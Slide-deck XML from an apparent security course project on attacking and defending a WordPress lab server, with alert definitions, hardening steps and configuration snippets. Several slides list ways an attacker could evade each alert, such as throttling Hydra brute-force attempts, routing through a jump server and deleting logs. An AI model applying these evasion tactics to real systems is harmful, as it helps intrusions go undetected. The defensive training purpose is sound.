                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;302;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16923225" y="4005325"/>
            <a:ext cx="4719124" cy="433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08" name="Google Shape;308;p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24</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;309;p4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10" name="Google Shape;310;p4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Stealth Exploitation of Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;3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sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p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318" name="Google Shape;318;p42"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176950" y="323412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Monitoring Overview</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Mitigation Detection</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SSH login Alert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Monitor SSH Port through triggers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suspicious access to monitor geo-location and hour based alerts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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>j</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ump server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> in the network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Attack through a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>different port</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </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 using wpscan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CVE-2009-2334</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HTTP Response Status Code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Triggered at thresholds above 400</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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>command line sniffing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> rather than automated program like wpscan</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Excessive HTTP Error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This alert measures the number of times an HTTP Response Status code is over 400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The alert would fire at a threshold of more than 5 attempts in 5 minutes.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Spacing out the brute-force attempts through </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hydra time delay</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>, using -w option on hydra command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highlight>
                            <a:schemeClr val="accent6"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Alternatives to Hydra</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> may include programs like Dirbuster, DIRB, Wfuzz, Metasploit, Dirsearch</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words like a user, password or email in a string or config files using tools like Gittyleaks, Repo Security Scanner or GitGuardian generating alert logs.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An attacker trying to hide any activity involving access to any data within a file will try to delete or manipulate all possible logs for those alerts.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SQL Database Alert - unauthorized access attempts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Triggers when external or unauthorized IPs make connections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Find other vulnerabilities in the kernel and exploit them for root access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24" name="Google Shape;324;p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26</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Google Shape;325;p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26" name="Google Shape;326;p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a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;33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sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333;p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solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="334" name="Google Shape;334;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="4088105"/>
            <a:ext cx="15808626" cy="7307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;335;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703372" y="1701000"/>
            <a:ext cx="14983301" cy="2387100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="336" name="Google Shape;336;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15686675" y="1701003"/>
            <a:ext cx="8690974" cy="8236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42" name="Google Shape;342;p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28</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;343;p4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II: Defensive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44" name="Google Shape;344;p4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II: Defensive Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;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sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p4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353" name="Google Shape;353;p4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354" name="Google Shape;354;p46"/>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Alerts Implemented</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p46"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p46"/>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Implementing Patches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127" name="Google Shape;127;p20"/>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t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p20"/>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62" name="Google Shape;362;p4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30</a:t>
            </a:fld>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Excessive HTTP Errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;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31</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;369;p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‘http.response.status_code’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grouped top five error codes exceeds 400 for the previous five minutes.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Google Shape;370;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4910350" y="7667600"/>
            <a:ext cx="13658850" cy="46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Request Size Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;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
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p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‘http.request.bytes’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sum of the bytes for http requests exceeds 3500 bytes for the previous minute.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="378" name="Google Shape;378;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4547050" y="7509650"/>
            <a:ext cx="13487400"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CPU Usage Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;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385" name="Google Shape;385;p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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does this alert monitor?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This alert is monitoring the ‘system.process.cpu.total.pct’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max total percentage of CPU usage is over 0.5% for the previous five minutes.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="386" name="Google Shape;386;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4851875" y="7552000"/>
            <a:ext cx="13449300" cy="461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392" name="Google Shape;392;p5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393" name="Google Shape;393;p5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34</a:t>
            </a:fld>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V1: Port Scanning &amp; open SSH on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;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sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2113925"/>
            <a:ext cx="22942800" cy="10840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-514350" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To prevent Port scanning on your IP, a well configured firewall will be needed to alert and prevent any information to be gathered.</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572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WordPress has Firewall Plugins available for easy installation for non-developer users that routes website traffic through a cloud proxy server.</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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All traffic should be denied by default. Then, only allowed traffic is added in. Choose the allowed traffic based on the following parameters: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Source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Port</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Protocol of the Traffic </a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="18288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It works because only legitimate users can access the web server.</a:t>
            </a:r>
            <a:endParaRPr sz="180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401" name="Google Shape;401;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10578775" y="7951850"/>
            <a:ext cx="3810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ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hardening Against V2: Brute-Force attack on Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407;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sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="2163526"/>
            <a:ext cx="24377700" cy="10812300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-550862" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limit failed login attempts</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Account Lockouts with progressive delays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password complexity, length, character set, and history.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multi-factor authentication.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Make the root user inaccessible via SSH by editing the sshd_config file</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Set the ‘DenyUsers root’ and ‘PermitRootLogin no’ options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Use Captcha</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highly effective against bots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Limit logins to a specified IP address or range</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Monitor server logs</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2100"/>
              </a:spcAft>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400"/>
              <a:t>Hardening Against V3 “Enumerate usernames in WordPress” on Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="5400" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;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
        <p:nvSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p5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46100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the NGINX configuration levels in the WordPress theme’s functions.php file to prevent scanning.</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="4" indent="-546100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block XMLRPC:</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location ^~ /xmlrpc.php {</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deny all;</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error_page 403 =404 / ;</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>							}</a:t>
            </a:r>
            <a:endParaRPr sz="5000">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914400" lvl="0" indent="-546100" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stay updated with the latest version of WordPress = 5.7 “esperanza”</a:t>
            </a:r>
            <a:endParaRPr sz="5000" b="1">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0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="10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V4: Access to “wp-config.php” file</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;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38</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p55"/>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use root user (MySQL-dB) </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 Use account with customized privilege</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Restrict file permission only to the owner of wp-config.php</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chmod 700 wp-config.php</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Use “.htaccess” file to restrict access</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The .htaccess file allows you to set server configurations for a specific directory.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 wp-config.php&gt;</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order allow, deny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deny from all</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&lt;/files&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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V5: Privilege Escalation in Sudo</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;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39</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
